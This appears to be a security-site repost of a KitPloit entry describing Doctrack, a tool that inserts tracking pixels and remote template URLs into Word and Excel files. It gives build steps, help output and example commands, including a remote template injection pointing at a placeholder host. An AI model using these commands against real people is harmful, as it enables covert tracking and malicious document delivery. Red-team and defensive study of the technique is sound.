Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
kitploitKitPloitKITPLOIT:5572469956845416435
HistoryNov 19, 2020 - 8:30 p.m.

Doctrack - Tool To Manipulate And Insert Tracking Pixels Into Office Open XML Documents (Word, Excel)

2020-11-1920:30:00
www.kitploit.com
173

7.9 High

AI Score

Confidence

Low

JSON

Tool to manipulate and insert tracking pixels into Office Open XML documents.

Features

  • Insert tracking pixels into Office Open XML documents (Word and Excel)
  • Inject template URL for remote template injection attack
  • Inspect external target URLs and metadata
  • Create Office Open XML documents (#TODO)

Installation

You will need to download .Net Core SDK for your platform. Then, to build single binary on Windows:

$ git clone https://github.com/wavvs/doctrack.git  
$ cd doctrack/  
$ dotnet publish -r win-x64 -c Release /p:PublishSingleFile=true

On Linux:

$ dotnet publish -r linux-x64 -c Release /p:PublishSingleFile=true

Usage

$ doctrack --help  
Tool to manipulate and insert tracking pixels into Office Open XML documents.  
Copyright (C) 2020 doctrack  
  
  -i, --input         Input filename.  
  -o, --output        Output filename.  
  -m, --metadata      [Metadata](<https://www.kitploit.com/search/label/Metadata> "Metadata" ) to supply (json file)  
  -u, --url           URL to insert.  
  -e, --template      (Default: false) If set, enables template URL injection.  
  -t, --type          Document type. If --input is not specified, creates new  
                      document and saves as --output.  
  -l, --list-types    (Default: false) Lists available types for document  
                      creation.  
  -s, --inspect       (Default: false) Inspect external targets.  
  --help              Display this help screen.

Available document types listed below. If you want to insert tracking URL just use either Document or Workbook types, other types listed here are only for document creation (#TODO).

$ doctrack --list-types  
Document              (*.docx)  
MacroEnabledDocument  (*.docm)  
MacroEnabledTemplate  (*.dotm)  
Template              (*.dotx)  
Workbook              (*.xlsx)  
MacroEnabledWorkbook  (*.xlsm)  
MacroEnabledTemplateX (*.xltm)  
TemplateX             (*.xltx)

Insert tracking pixel and change document metadata:

$ doctrack -t Document -i test.docx -o test.docx --metadata metadata.json --url http://test.url/image.png

Insert remote template URL (remote template injection attack), works only with Word documents:

$ doctrack -t Document -i test.docx -o test.docx --url http://test.url/template.dotm --template

Inspect external target URLs and metadata:

$ doctrack -t Document -i test.docx --inspect  
[External targets]  
Part: /word/document.xml, ID: R8783bc77406d476d, URI: http://test.url/image.png  
Part: /word/settings.xml, ID: R33c36bdf400b44f6, URI: http://test.url/template.dotm  
[Metadata]  
Creator:  
Title:  
Subject:  
Category:  
Keywords:  
Description:  
ContentType:  
ContentStatus:  
Version:  
Revision:  
Created: 13.10.2020 23:20:39  
Modified: 13.10.2020 23:20:39  
LastModifiedBy:  
LastPrinted: 13.10.2020 23:20:39  
Language:  
Identifier:

Download Doctrack

7.9 High

AI Score

Confidence

Low

JSON